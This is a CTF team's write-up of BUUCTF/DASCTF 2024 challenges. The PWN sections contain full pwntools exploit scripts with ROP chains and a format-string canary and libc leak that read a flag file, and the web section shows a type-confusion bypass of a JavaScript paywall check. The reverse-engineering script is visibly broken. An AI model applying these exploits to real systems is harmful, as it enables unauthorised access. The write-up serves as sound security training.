2024BUUCTF Lilac2战队WriteUp

菜单

  1. 排名
  2. 解题思路
    • PWN
      • Control
      • Exception
    • WEB
      • cool_index
    • Crypto
      • The_Mystery_of_Math
    • Reverse
      • prese
    • MISC
      • BadMes

排名

13名

解题思路

PWN

Control

首先查看main

发现gift 中只读取 0x10 字节。

然后进入vuln中 存在栈溢出

首先盖缓冲区一直盖到rip,然后跳到gift位置,要注意还原Unwind_RaiseException的指针,使得异常正确捕获 然后ROP

p.send(flat(
    b'f'*0x20,
    b'/flag\x00\x00\x00',
    pop_rdi, flag_addr,
    pop_rsi, 0,
    pop_rdx, 0,
    open, # open
    pop_rdi, 3,
    pop_rsi, bss_addr,
    pop_rdx, 0x100,
    read, # read
    pop_rdi, 1,
    pop_rsi, bss_addr,
    pop_rdx, 0x100,
    write
))

整体exp

from pwn import *
# p = remote("node5.buuoj.cn",25728)
p = process("./control")
context.arch = 'amd64'
context.log_level = 'debug'
context.terminal = ['tmux','splitw','-h']

bss_addr = 0x4D4400
bss_addr2 = 0x4D3100

gift_addr = 0x4D3350
magic_addr = 0x402183

sys_read = 0x4621A7

obj_point = 0x4D3320
p.sendlineafter("Gift> ",flat(0x4d33a0,magic_addr))
payload = b'a'*0x70 + p64(gift_addr)
p.sendlineafter("How much do you know about control?", payload)

flag_addr = gift_addr

read = 0x462170
write = 0x462210
open = 0x462040
pop_rdi = 0x0000000000401c72
pop_rsi = 0x0000000000405285
pop_rdx = 0x0000000000401aff

# pause()

p.send(flat(
    b'f'*0x20,
    b'/flag\x00\x00\x00',
    pop_rdi, flag_addr,
    pop_rsi, 0,
    pop_rdx, 0,
    open, # open
    pop_rdi, 3,
    pop_rsi, bss_addr,
    pop_rdx, 0x100,
    read, # read
    pop_rdi, 1,
    pop_rsi, bss_addr,
    pop_rdx, 0x100,
    write
))
# gdb.attach(p)
p.interactive()

Exception

checksec exception 
zephyr@zephyr-virtual-machine:~/studyingtable/basctf/aa$ checksec exception
[*] '/home/zephyr/studyingtable/basctf/aa/exception'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

保护全开,但存在fmt

构造payload都泄露泄露

printf_payload =  b'%p-%p-%p-%p-%p-%p-%p-%19$p-'

然后同样注意恢复Unwind_RaiseException的指针,然后由于有Canary,应当控制rbp还原一下canary

最后ROP

from pwn import *
from LibcSearcher import *
# p = process('./exception')
p = remote("node5.buuoj.cn",28637)
context.terminal = ['tmux','splitw','-h']
# elf = ELF('./easyFMT')
context.arch = 'amd64'
context.log_level = 'debug'
printf_payload =  b'%p-%p-%p-%p-%p-%p-%p-%19$p-'
p.sendafter("please tell me your name\n",printf_payload)
leak = p.recvline().decode('utf-8').split("-")

print(leak)

elf_base = int(leak[0], 16) - (0x6433b8b6d060 - 0x6433b8b6c000) - 0x3000
libc_base = int(leak[2], 16) - (0x7f5a392ae1f2 - 0x7f5a391a0000)
ld_base = int(leak[4], 16) - (0x7f86e8789d60 - 0x7f86e8778000)
canary = int(leak[6], 16)
stack_leak = int(leak[7], 16)

what_addr = elf_base + 0x613e02e46408 - 0x613e02e45000

pop_rdi = elf_base + 0x00000000000014e3
pop_rsi_r15 = elf_base + 0x00000000000014e1

payload = flat(
    b'a' * 0x70,
    stack_leak - 0x2918 + 0x18,
    what_addr,
    # 填充
    b'a'*0x28,
    pop_rdi,
    libc_base + 0x00000000001b45bd,
    pop_rsi_r15, 
    0,
    0,
    libc_base + 0x7378c9f70290 - 0x7378c9f1e000,
)
p.sendlineafter("How much do you know about exception?",payload)

p.interactive()

WEB

cool_index

拿到题目附件,发现在server.js中有post请求的处理函数,我们希望能够执行到articles[index],因此,

app.post("/article", (req, res) => {
    const token = req.cookies.token;
    if (token) {
        try {
            const decoded = jwt.verify(token, JWT_SECRET);
            let index = req.body.index;
            if (req.body.index < 0) {
                return res.status(400).json({ message: "你知道我要说什么" });
            }
            if (decoded.subscription !== "premium" && index >= 7) {
                return res
                    .status(403)
                    .json({ message: "订阅高级会员以解锁" });
            }
            index = parseInt(index);
            if (Number.isNaN(index) || index > articles.length - 1) {
                return res.status(400).json({ message: "你知道我要说什么" });
            }

            return res.json(articles[index]);
        } catch (error) {
            res.clearCookie("token");
            return res.status(403).json({ message: "重新登录罢" });
        }
    } else {
        return res.status(403).json({ message: "未登录" });
    }
});

https://www.notion.so

https://www.notion.so

我们需要绕过上面的if,在index = parseInt(index)之前,index不一定是数字类型,因此可以利用js的弱类型比较,post一个json格式的数据,index项为“7-1”,其中,这个表达式在parseInt后结果是7,这样能够访问到第8段文字,由代码可以知道,第八段文字中包含flag。

https://www.notion.so

Crypto

The_Mystery_of_Math

首先分析程序源代码,程序通过某种方式将一个表达式化作整数,具体来说它为每个符号随机选取1到30的值,然后取前n个质数作为底数,n等于表达式长度,然后从左往右将符号对应值作为指数,通过质因数相乘将表达式唯一映射到一个大整数。

flag使用rsa加密,其中的rsa参数p为一个随机表达式的对应整数,表达式已知,对应方式未知,关键在于求字符对应的整数。

向程序输入表达式,程序返回表达式的合取和析取范式的对应值的最大公因数。用yafu工具将最大公因数分解因数,然后纪录结果中各因数个数。

def generate_primes(count, start=2):
        primes = []
        tmp = start

        while len(primes) < count:
            primes.append(tmp)
            tmp = nextprime(tmp)

        return primes

number_counts = {}
with open('./ans.txt', 'r',encoding='utf-8') as file:
    for line in file:
        number = int(line.split('=')[1].strip())
        if number in number_counts:
            number_counts[number] += 1
        else:
            number_counts[number] = 1

num = [-1]
for number, count in number_counts.items():
    num.append(count)

我输入的表达式,标准合取析取范式和随机表达式如下,选择这个表达式是因为在较简单的基础上涵盖了随机表达式的大部分符号

raw = 'p∨q∧r'
m = '(﹁p∧q∧r)∨(p∧﹁q∧﹁r)∨(p∧﹁q∧' #m长于M的部分没有价值
M = '(p∨q∨r)∧(p∨q∨﹁r)∧(p∨﹁q∨r)'
rand = '(q∨﹁r)→(p→p∨r)'

两个范式的最大公因数分解后,第n个质数的数量就是两个范式第n位符号对应数字较小的值,这里数据量较小,直接按顺序打印出来手动分析

(    (    5
﹁    p    14
p    ∨    14
∧    q    15
q    ∨    19
∧    r    6
r    )    2
)    ∧    2
∨    (    5
(    p    5
p    ∨    14
∧    q    15
﹁    ∨    20
q    ﹁    19
∧    r    6
﹁    )    2
r    ∧    6
)    (    2
∨    p    14
(    ∨    5
p    ﹁    14
∧    q    15
﹁    ∨    20
q    r    6
∧    )    2

可以确定大部分字符的对应值,但’﹁’和’∨’无法确定,只知道其中一个是20,且’→’完全无法确定,因为合取和析取表达式中无法包含’→’符号,对于无法确定的符号直接采取枚举。

剩下的就是枚举未确定符号,尝试解密rsa

gns = []
for place1 in range(13,31):
    for place2 in range(0,31):
        gn=1
        dict = {'(':5, ')':2, 'p':14, 'r':6, 'q':19, '∧':15, '﹁':place1 , '∨':20, '→':place2}
        p = generate_primes(len(rand))
        for c, prime in zip(rand, p):
            gn *= prime ** dict[c]
        gns.append(gn)

for gn in gns:
    p = nextprime(gn)
    e = 65537
    n = 1137172127284369869803689158992369690490272208110182565787939818165586740154880578406597461267011790008597261169944837957168668588905713734156386454097253259560926131330841143782785931705121705907269192799801169819886097624110623526117632976309320685269484987335153165692227879393589856721546968658115495141290955001293027886716654490810821263924351
    if n%p!=0:
        continue
    c = 1058860053870470008834107468308481975669782076474124562760310285239556043301978327253471653377850236556602688507075644885204045048193626604548693160652201424296163254345857462646915821147545877162409743044223130692594237475439082678732619900813415713826096465652015239899141704769841905515808661190090689683470897855298118376530279528761852705750452
    q = n // p
    yn = (p - 1) * (q - 1)
    d = pow(e, -1, yn)
    m = pow(c, d, n)

flag = str(long_to_bytes(m))
print(flag)

解密成功,拿到flag: DASCTF{a205a1b0-0534-4f8b-b0c2-720079e08b3e}

Reverse

prese

用IDA打开附件,观察程序调用图,发现明显为ollvm混淆,利用反混淆工具D-810,exp如下:

 for t in range(32):
    print(t)
mem = []
for index in range(256):
    mem.append(~((t^index)&0xff)&0xff)
print(mem)
flag = ''
f = [0x86, 0x83, 0x91, 0x81, 0x96, 0x84, 0xB9, 0xA5, 0xAD, 0xAD, 0xA6, 0x9D, 0xB6, 0xAA, 0xA7, 0x9D, 0xB0, 0xA7, 0x9D, 0xAB, 0xB1, 0x9D, 0xA7, 0xA3, 0xB1, 0xBB, 0xAA, 0xAA, 0xAA, 0xAA, 0xBF, 0x00]
for i in range(len(f)):
t = f[i]^0x22
for j in range(len(mem)):
if mem[j] == t:
flag = flag + chr((j)&0xff)
print(flag)

拿到flag,DASCTF{good_the_re_is_easyhhhh}

MISC

BadMes

获取数据集,发现只有消息,没有标签,先利用transformer+Kmeans做聚类打标签

import tensorflow as tf
from tensorflow.keras.layers import TextVectorization, Embedding, MultiHeadAttention, Dense, LayerNormalization, Dropout, GlobalAveragePooling1D, Input
from tensorflow.keras.models import Model
import pandas as pd
import chardet
from sklearn.cluster import KMeans
import numpy as np

# 使用open函数打开文件,并忽略解码错误
with open('data_2.csv', 'r', encoding='gb2312', errors='ignore') as file:
    data = pd.read_csv(file)
texts = data['message'].astype(str).tolist()

# 数据预处理:文本向量化
max_tokens = 20000
max_len = 256
text_vectorization = TextVectorization(max_tokens=max_tokens, output_sequence_length=max_len)
text_vectorization.adapt(texts)

# Transformer Block Layer
class TransformerBlock(tf.keras.layers.Layer):
    def __init__(self, embed_dim, num_heads, ff_dim, rate=0.1):
        super(TransformerBlock, self).__init__()
        self.att = MultiHeadAttention(num_heads=num_heads, key_dim=embed_dim)
        self.ffn = tf.keras.Sequential(
            [Dense(ff_dim, activation="relu"), Dense(embed_dim)]
        )
        self.layernorm1 = LayerNormalization(epsilon=1e-6)
        self.layernorm2 = LayerNormalization(epsilon=1e-6)
        self.dropout1 = Dropout(rate)
        self.dropout2 = Dropout(rate)

    def call(self, inputs, training=False):
        attn_output = self.att(inputs, inputs)
        attn_output = self.dropout1(attn_output, training=training)
        out1 = self.layernorm1(inputs + attn_output)
        ffn_output = self.ffn(out1)
        ffn_output = self.dropout2(ffn_output, training=training)
        return self.layernorm2(out1 + ffn_output)

# 构建模型
embed_dim = 32  # Embedding size for each token
num_heads = 2  # Number of attention heads
ff_dim = 32  # Hidden layer size in feed forward network inside transformer

inputs = Input(shape=(), dtype=tf.string)  # 确保输入是一维的
x = text_vectorization(inputs)
x = Embedding(max_tokens, embed_dim)(x)
x = TransformerBlock(embed_dim, num_heads, ff_dim)(x)
x = GlobalAveragePooling1D()(x)

model = Model(inputs=inputs, outputs=x)

# 预测文本的嵌入表示,这里直接使用原始文本数据
x_embeddings = model.predict(texts)  # 直接传递原始文本列表

# 应用K-means聚类
kmeans = KMeans(n_clusters=2, random_state=42)
kmeans.fit(x_embeddings)
cluster_labels = kmeans.labels_  # 获取聚类标签

# 将聚类结果附加到原始数据
data['cluster'] = cluster_labels
data.to_csv('saved.csv')
print(data.head())

人为修正一些标签之后,用transformer训练

message,cluster
到达目的地后全车x个人开始腹泻,0
是浙江建德市低压电器产业生态的真实变迁,0
胡萝卜素增加3倍、维生素Bl2增加4倍、维生素C增加4,0
高管都需要KPI就没资格做高管,0
护士一检查惊呼怎么牙都蛀成这样了,0
x.x-x.x来张家边苏宁!抢美的空调! 预存xx元:最低=xxx元,最高=xxxx元!预约电话:李店长:xxxxxxxxxxx,1
火箭休赛期总结:可冲击西部冠军惧怕三劲敌,0
中国陆军总兵力有步兵182个师、另加46个独立旅,0
可是黑龙江的贪官腐败分子怎么就揪不出来呀,0
喜欢?卫星15052350470,0
除非因疾病的非正常原因或到法定退休年龄退出,0
发个QQ消息让所有同学回学校办理,0
【hongkee旗舰店】#女人节大促温暖登场#全场x.x折起,新款x.x折仍可用优惠券,x.x当日更有iphonexplus等大奖等亲来拿!,1
破获盗窃电线、电动机等案件10起,0
import pandas as pd
import numpy as np
import tensorflow as tf
from tensorflow.keras.layers import TextVectorization, Embedding, MultiHeadAttention, Dense, LayerNormalization, Dropout, GlobalAveragePooling1D, Input
from tensorflow.keras.models import Model
from sklearn.model_selection import train_test_split

def data_generator(filename, batch_size):
    while True:
        texts, labels = [], []
        with open(filename, 'r', encoding='utf-8') as file:
            next(file)  # 跳过文件头(如果存在)
            for line in file:
                if len(texts) == batch_size:
                    yield (np.array(texts), np.array(labels))
                    texts, labels = [], []  # 重置,准备下一批次
                index, label, message = line.strip().split('\t')
                texts.append(message)
                labels.append(int(label))
            if texts:
                yield (np.array(texts), np.array(labels))  # 输出最后一批数据

# Define TextVectorization outside the model to adapt it on a sample dataset
sample_texts = ['Sample text data for vectorization.']  # Example text
text_vectorization = TextVectorization(max_tokens=10000, output_sequence_length=128)
text_vectorization.adapt(sample_texts)

# Transformer Block Layer
class TransformerBlock(tf.keras.layers.Layer):
    def __init__(self, embed_dim, num_heads, ff_dim, rate=0.1):
        super(TransformerBlock, self).__init__()
        self.att = MultiHeadAttention(num_heads=num_heads, key_dim=embed_dim)
        self.ffn = tf.keras.Sequential([
            Dense(ff_dim, activation="relu"), 
            Dense(embed_dim)
        ])
        self.layernorm1 = LayerNormalization(epsilon=1e-6)
        self.layernorm2 = LayerNormalization(epsilon=1e-6)
        self.dropout1 = Dropout(rate)
        self.dropout2 = Dropout(rate)

    def call(self, inputs, training=False):
        attn_output = self.att(inputs, inputs)
        attn_output = self.dropout1(attn_output, training=training)
        out1 = self.layernorm1(inputs + attn_output)
        ffn_output = self.ffn(out1)
        ffn_output = self.dropout2(ffn_output, training=training)
        return self.layernorm2(out1 + ffn_output)

# Model building
embed_dim = 32
num_heads = 2
ff_dim = 32
inputs = Input(shape=(), dtype=tf.string)  # 正确:期望每个输入是单独的字符串
x = text_vectorization(inputs)  # 将文本向量化应用于输入

x = Embedding(10000, embed_dim)(x)
x = TransformerBlock(embed_dim, num_heads, ff_dim)(x)
x = GlobalAveragePooling1D()(x)
outputs = Dense(1, activation='sigmoid')(x)
model = Model(inputs=inputs, outputs=outputs)

model.compile(optimizer="adam", loss="binary_crossentropy", metrics=["accuracy"])

# Training model using generator
train_gen = data_generator('80w.txt', batch_size=32)
valid_gen = data_generator('80w.txt', batch_size=32)  # Ideally, use a separate validation file or method

model.fit(train_gen, steps_per_epoch=100, epochs=200, validation_data=valid_gen, validation_steps=10)

# # 测试数据生成器
# test_gen = data_generator('test_data.txt', 32)  # 假设你有一个分开的测试数据集文件

# # 使用生成器进行模型评估
# test_loss, test_acc = model.evaluate(test_gen, steps=10)  # 确保提供足够的测试步骤
# print(f"Test Accuracy: {test_acc}")

# Save model
model.save("transformer_binary_classification_model")

然后写一个socket链接脚本,循环打

import socket
import tensorflow as tf
import numpy as np

# 加载整个模型(假设模型和TextVectorization一起保存)
model = tf.keras.models.load_model("transformer_binary_classification_model")

# 连接到nc服务器
host = '4.216.46.225'  # 服务器IP地址
port = 2333  # 服务器端口号

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((host, port))
    print("Connected to nc server.")

    try:
        while True:
            # 从nc服务器接收消息
            received_data = s.recv(1024).decode("utf-8")
            if not received_data:
                print("No more data from server. Exiting.")
                break
            print("Received message from nc server:", received_data)

            # 处理接收到的消息
            processed_data = np.array([received_data])  # 将接收的消息包装为NumPy数组
            prediction = model.predict(processed_data)[0][0]  # 进行分类预测
            result = 1 if prediction > 0.55 else 0  # 将预测结果转换为0或1

            # 将分类结果发送给nc服务器
            s.sendall(str(result).encode("utf-8"))
            print("Classification result sent to nc server.")
    except KeyboardInterrupt:
        print("Disconnected from server.")
    except Exception as e:
        print(f"An error occurred: {e}")

在训练300轮下,accuracy可以达到95.8% 最好情况下261/300

DASCTF{OB0b73eC3VVpvbadnne3}